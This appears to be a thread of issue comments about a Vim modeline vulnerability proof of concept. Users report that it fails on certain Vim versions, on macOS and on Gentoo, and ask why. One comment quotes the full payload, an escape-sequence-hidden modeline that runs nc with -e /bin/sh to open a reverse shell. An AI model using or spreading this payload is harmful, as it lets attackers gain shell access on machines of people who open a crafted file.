Hi,

I would like to confirm this poc with VIM version 8.0.1453 which is vuln version
but it doesn't work for me.

I set "modeline" to be activated to /etc/vim/vimrc( i tested with 2 thing, set modeline, :set modeline)

I check with command line "set modeline?"
modline was activated properly...

and then I open poc.txt with vim.
nothing happened. Do you know what problem is??
test poc is like below

:

I got this

cat shell.txt

\x1b[?7l\x1bSNothing here.\x1b:silent! w | call system('nohup nc 127.0.0.1 9999 -e /bin/sh &') | redraw! | file | silent! # " vim: set fen fdm=expr fde=assert_fails('set\ fde=x\ \|\ source\!\ \%') fdl=0: \x16\x1b[1G\x16\x1b[KNothing here."\x16\x1b[D \n

vim shell.txt
"shell.txt" 1L, 264C
处理 modelines 时发生错误:
第 1 行:
E518: 未知的选项: \|\

Hi,

The modeline is by default enabled on Mac osx. However, both payloads stated in your advisory are not working for Mac with outdated Vim version. They work fine on Ubuntu OS. Is is possible that the implementation of Vim is different? Can you take a look at what happened?

Hello,

I'm trying the poc on this a vim 8.1.0648-r1 but it doesn't work.

I'm not using vim and have barely knownledge of this editor but here what I have checked so far :

By default :set modelines? show nomodeline. I created a .vimrc with the following content

set modelines=1
set modeline

and run like

vim -u .vimrc and

:set modelines? show modeline. I saved the file poc.txt found in this repo and opened it with vim -u .vimrc poc.txt but it didn't return a uname -a but instead display the content of the file.

vim --version

VIM - Vi IMproved 8.1 (2018 May 18, compiled May 10 2019 13:57:46)
Included patches: 1-648
Modified by Gentoo-8.1.0648-r1
Compiled by portage@localhost
Tiny version without GUI. Features included (+) or not (-):
+acl -extra_search -mouse_sgr -tcl
-arabic -farsi -mouse_sysmouse -termguicolors
+autocmd -file_in_path -mouse_urxvt -terminal
-autochdir -find_in_path -mouse_xterm +terminfo
-autoservername -float -multi_byte -termresponse
-balloon_eval -folding -multi_lang -textobjects
-balloon_eval_term -footer -mzscheme -textprop
-browse +fork() -netbeans_intg -timers
+builtin_terms -gettext -num64 -title
-byte_offset -hangul_input -packages -toolbar
-channel -iconv -path_extra -user_commands
-cindent -insert_expand -perl -vartabs
-clientserver -job -persistent_undo +vertsplit
-clipboard -jumplist -printer -virtualedit
-cmdline_compl -keymap -profile +visual
-cmdline_hist -lambda -python -visualextra
-cmdline_info -langmap -python3 -viminfo
-comments -libcall -quickfix +vreplace
-conceal -linebreak -reltime +wildignore
-cryptv -lispindent -rightleft -wildmenu
-cscope +listcmds -ruby +windows
+cursorbind -localmap +scrollbind +writebackup
-cursorshape -lua -signs -X11
-dialog -menu -smartindent -xfontset
-diff -mksession -startuptime -xim
-digraphs -modify_fname -statusline -xpm
-dnd -mouse -sun_workshop -xsmp
-ebcdic -mouse_dec -syntax -xterm_clipboard
-emacs_tags -mouse_gpm +tag_binary -xterm_save
-eval -mouse_jsbterm -tag_old_static
+ex_extra -mouse_netterm -tag_any_white
system vimrc file: "/etc/vim/vimrc"
user vimrc file: "$HOME/.vimrc"
2nd user vimrc file: "~/.vim/vimrc"
user exrc file: "$HOME/.exrc"
defaults file: "$VIMRUNTIME/defaults.vim"
fall-back for $VIM: "/usr/share/vim"
Compilation: x86_64-gentoo-linux-musl-gcc -c -I. -Iproto -DHAVE_CONFIG_H -O2 -pipe -U_FORTIFY_SOURCE -D_FORTIFY_SOURCE=1
Linking: x86_64-gentoo-linux-musl-gcc -Wl,-O1 -L/usr/local/lib -Wl,--as-needed -o vim -lm -lncurses -lelf

I suppose on of those feature must be enabled in order to make the poc working, but didn't find yet which on...

Thanks

Hi,

I realize that function assert_fails is added in version 8, does that mean vim74 is not affected by this vulnerability, or how could I construct poc on vim74?

Thanks